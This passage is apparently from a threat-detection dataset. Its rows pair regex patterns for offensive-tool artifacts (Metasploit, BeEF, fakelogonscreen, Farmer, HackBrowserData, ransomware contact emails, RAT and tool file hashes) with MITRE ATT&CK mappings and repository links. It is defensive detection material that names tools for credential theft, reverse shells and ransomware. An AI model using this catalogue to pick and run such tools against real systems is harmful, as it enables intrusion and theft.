It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","44422" "*Fake Computer Objects Honey Pots*",".{0,1000}Fake\sComputer\sObjects\sHoney\sPots.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","N/A","8","3","282","57","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z","44423" "*Fake Service Accounts Honey Tokens*",".{0,1000}Fake\sService\sAccounts\sHoney\sTokens.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","N/A","8","3","282","57","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z","44424" "*fake_ap.py*",".{0,1000}fake_ap\.py.{0,1000}","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","N/A","8","1","67","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z","44425" "*fake_common_roots.txt*",".{0,1000}fake_common_roots\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","44426" "*fake_default_wordlist.txt*",".{0,1000}fake_default_wordlist\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","44427" "*fake_evernote_clipper*",".{0,1000}fake_evernote_clipper.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","44428" "*fake_flash_update*",".{0,1000}fake_flash_update.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","0","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","44429" "*fake_hostnames(hostnames_list)*",".{0,1000}fake_hostnames\(hostnames_list\).{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/xFreed0m/RDPassSpray","1","0","N/A","N/A","10","7","648","244","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z","44430" "*fake_lastpass/*",".{0,1000}fake_lastpass\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","44431" "*fake_notification_ff/*",".{0,1000}fake_notification_ff\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","44432" "*FakeAMSI.c*",".{0,1000}FakeAMSI\.c.{0,1000}","offensive_tool_keyword","FakeAMSI","Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. 
And it sounds like perfect opportunity to misuse such DLL as a method of persistence","T1117 - T1027","TA0003 ","N/A","N/A","Persistence","https://github.com/gtworek/PSBits/tree/master/FakeAMSI","1","1","N/A","N/A","N/A","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","44433" "*FakeAMSI.dll*",".{0,1000}FakeAMSI\.dll.{0,1000}","offensive_tool_keyword","FakeAMSI","Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence","T1117 - T1027","TA0003 ","N/A","N/A","Persistence","https://github.com/gtworek/PSBits/tree/master/FakeAMSI","1","1","N/A","N/A","N/A","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","44434" "*FakeAMSI.exe*",".{0,1000}FakeAMSI\.exe.{0,1000}","offensive_tool_keyword","FakeAMSI","Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence","T1117 - T1027","TA0003 ","N/A","N/A","Persistence","https://github.com/gtworek/PSBits/tree/master/FakeAMSI","1","1","N/A","N/A","N/A","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","44435" "*FakeCmdLine.*",".{0,1000}FakeCmdLine\..{0,1000}","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. 
Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","1","N/A","N/A","N/A","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","44436" "*FakeCmdLine.exe*",".{0,1000}FakeCmdLine\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","44437" "*Fake-Cmdline.exe*",".{0,1000}Fake\-Cmdline\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","44438" "*FakeDriver.java*",".{0,1000}FakeDriver\.java.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","44439" "*FakeDriver2.java*",".{0,1000}FakeDriver2\.java.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","44440" "*fakefuse.c*",".{0,1000}fakefuse\.c.{0,1000}","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","N/A","4","369","56","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z","44441" "*fakefuse.h*",".{0,1000}fakefuse\.h.{0,1000}","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","N/A","4","369","56","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z","44442" "*FakeImageExploiter*",".{0,1000}FakeImageExploiter.{0,1000}","offensive_tool_keyword","FakeImageExploiter","This module takes one existing image.jpg and one payload.ps1 (input by user) and builds a new payload (agent.jpg.exe) that if executed it will trigger the download of the 2 previous files stored into apache2 (image.jpg + payload.ps1) and execute them.","T1564 - T1218 - T1204 - T1558.001","TA0002 - TA0008 - TA0010","N/A","N/A","Phishing","https://github.com/r00t-3xp10it/FakeImageExploiter","1","1","N/A","N/A","N/A","10","912","338","2019-12-06T20:59:26Z","2017-04-04T20:53:47Z","44443" 
"*fakelogonscreen*.zip*",".{0,1000}fakelogonscreen.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","44444" "*FakeLogonScreen.csproj*",".{0,1000}FakeLogonScreen\.csproj.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","44445" "*FakeLogonScreen.Properties.Resources*",".{0,1000}FakeLogonScreen\.Properties\.Resources.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","0","#content","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","44446" "*FakeLogonScreen_trunk.zip*",".{0,1000}FakeLogonScreen_trunk\.zip.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","44447" "*FakeLogonScreenToFile.exe*",".{0,1000}FakeLogonScreenToFile\.exe.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential 
Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","44448" "*fakepath31337*",".{0,1000}fakepath31337.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","1","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","44449" "*FakePPID.*",".{0,1000}FakePPID\..{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","44450" "*fake-sms-main*",".{0,1000}fake\-sms\-main.{0,1000}","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","1","N/A","N/A","8","10","2745","176","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z","44451" "*faketime '202* zsh*",".{0,1000}faketime\s\'202.{0,1000}\szsh.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","44452" "*FalconForceTeam/SOAPHound*",".{0,1000}FalconForceTeam\/SOAPHound.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","1","N/A","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","44453" "*farmer.exe *\windows\temp*",".{0,1000}farmer\.exe\s.{0,1000}\\windows\\temp.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","N/A","10","4","379","61","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z","44454" "*farmer.exe 8888 60*",".{0,1000}farmer\.exe\s8888\s60.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","N/A","10","4","379","61","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z","44455" "*Farmer\Farmer.csproj*",".{0,1000}Farmer\\Farmer\.csproj.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. 
Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","N/A","10","4","379","61","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z","44456" "*Farmer-main.zip*",".{0,1000}Farmer\-main\.zip.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/Farmer","1","1","N/A","N/A","10","4","379","61","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z","44457" "*farusbig@tutanota.com*",".{0,1000}farusbig\@tutanota\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","44458" "*fast_decrypt_and_protect@tutanota.com*",".{0,1000}fast_decrypt_and_protect\@tutanota\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","44460" "*fastfuz-chrome-ext*files.txt*",".{0,1000}fastfuz\-chrome\-ext.{0,1000}files\.txt.{0,1000}","offensive_tool_keyword","fastfuzz","Fast fuzzing websites with chrome extension","T1110","TA0006","N/A","N/A","Vulnerability 
Scanner","https://github.com/tismayil/fastfuz-chrome-ext","1","1","N/A","N/A","N/A","1","25","5","2022-02-04T02:15:51Z","2022-02-04T00:22:51Z","44461" "*FastjsonScan.jar*",".{0,1000}FastjsonScan\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","network exploitation tool","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","44462" "*fasttrack/wordlist.txt*",".{0,1000}fasttrack\/wordlist\.txt.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","44463" "*favfreak-http*",".{0,1000}favfreak\-http.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","44466" "*fb094bd7cf03a1e0600f9b5efe757443fcd029ba98aabfd3bb6bd3f57c8bb45e*",".{0,1000}fb094bd7cf03a1e0600f9b5efe757443fcd029ba98aabfd3bb6bd3f57c8bb45e.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","44468" 
"*fb0eea49ed916aaa5428e80e86aa1136486e00f82637e099aa30469a434949f8*",".{0,1000}fb0eea49ed916aaa5428e80e86aa1136486e00f82637e099aa30469a434949f8.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","44469" "*fb120f28b0e4d979b147635e9549362bb12e35d4b24a345fc5f208dd089ae4cb*",".{0,1000}fb120f28b0e4d979b147635e9549362bb12e35d4b24a345fc5f208dd089ae4cb.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","44471" "*fb19ad10ef4970540e0715a263a97025dc4b3e86cf94082ab4e8224a22952ac1*",".{0,1000}fb19ad10ef4970540e0715a263a97025dc4b3e86cf94082ab4e8224a22952ac1.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","44472" "*fb20b0f19aab92962085d0d2fbf21ccc142620e12b6cccc20f28387b6c379d65*",".{0,1000}fb20b0f19aab92962085d0d2fbf21ccc142620e12b6cccc20f28387b6c379d65.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","44473" 
"*fb303e1f4c1afc4224f63622d445bf01fd55b4e54f7dbab5cb196a5ab55bfd36*",".{0,1000}fb303e1f4c1afc4224f63622d445bf01fd55b4e54f7dbab5cb196a5ab55bfd36.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44476" "*FB351327-0816-448B-8FB7-63B550D6C808*",".{0,1000}FB351327\-0816\-448B\-8FB7\-63B550D6C808.{0,1000}","offensive_tool_keyword","SimpleNTSyscallFuzzer","Fuzzer for Windows kernel syscalls.","T1055.011 - T1218","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/waleedassar/SimpleNTSyscallFuzzer","1","0","#GUIDproject","N/A","7","2","145","25","2024-01-25T02:39:31Z","2022-03-12T10:16:30Z","44477" "*fb38c399cf5ca62246e5f7ffdf4b0d65ec634efdaca466d5c6edb8ad2a5b5e5e*",".{0,1000}fb38c399cf5ca62246e5f7ffdf4b0d65ec634efdaca466d5c6edb8ad2a5b5e5e.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","44478" "*fb38cc904ebf94d6935270a46826254c413b9bc8cd69e9bafbe03998cdaea129*",".{0,1000}fb38cc904ebf94d6935270a46826254c413b9bc8cd69e9bafbe03998cdaea129.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44479" "*fb3fc9cf96316c4e18a633564cfc32f0345a14ec544715fdeb23a8e773d7d46b*",".{0,1000}fb3fc9cf96316c4e18a633564cfc32f0345a14ec544715fdeb23a8e773d7d46b.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","44481" "*fb436b85f221c5640e979d594788e7b377099191e153b76b16cc6f209b241528*",".{0,1000}fb436b85f221c5640e979d594788e7b377099191e153b76b16cc6f209b241528.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44482" "*fb4433e34eea9a727c126b2b806b9a064e4f332ddd32964f0838f2331a61e471*",".{0,1000}fb4433e34eea9a727c126b2b806b9a064e4f332ddd32964f0838f2331a61e471.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","44483" "*fb4983dc113b5fa5802639a9165564afa619e5c68997e62da4ce227ae7694700*",".{0,1000}fb4983dc113b5fa5802639a9165564afa619e5c68997e62da4ce227ae7694700.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - 
